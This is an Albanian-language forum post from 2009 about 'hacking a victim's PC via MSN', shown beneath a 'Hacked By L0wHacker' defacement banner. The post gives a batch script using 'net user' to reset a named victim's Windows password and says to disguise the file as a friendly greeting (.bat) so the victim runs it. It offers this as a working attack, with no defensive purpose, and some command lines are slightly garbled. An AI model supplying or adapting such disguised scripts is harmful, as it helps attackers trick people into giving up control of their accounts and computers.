Hacked By L0wHacker

Hacked By L0wHacker
Hacked By L0wHacker

Hacked by L0wHacker


  Si Tja Hack-im Viktimes PC Permes MSN

  Share
  avatar
  KosovaPower
  Super Moderator
  Super Moderator

  Si Tja Hack-im Viktimes PC Permes MSN

  Mesazh nga KosovaPower prej Fri May 15, 2009 10:58 am

  kjo osht per ata qe nuk e kan kuptu ata te paren qe kjo osht ni menyr me e leht une e kom provu 100% funksionon per te funksionuar kjo duhet te dini net userin e atij qe deshironi tja hackoni pc kjo osht ajo qe duhet te beni::
  krijoni nje text document te ri dhe ne te shkruani

  1echo off
  2:net user "P.SH. emri i viktimes" dhe passin e ri qe doni ju *654321*
  3:echo "tung i dashuri shok "
  4ause

  Qe edhe ma shpjegim te mire


  1echo off
  2:net user Big-POwer *654321*
  3:echo Tung MY Freind
  4ause

  mos harroni te futni passin e ri ne ato yjet ( shift 8 )
  ruajeni si diqka qe ju doni por me pikë bat( .bat ) psh.. Tung My Freind.bat
  ruajeni tek ALL FILES sepse ndryshe nuk funksionon

   Ora është Fri Apr 20, 2018 6:22 pm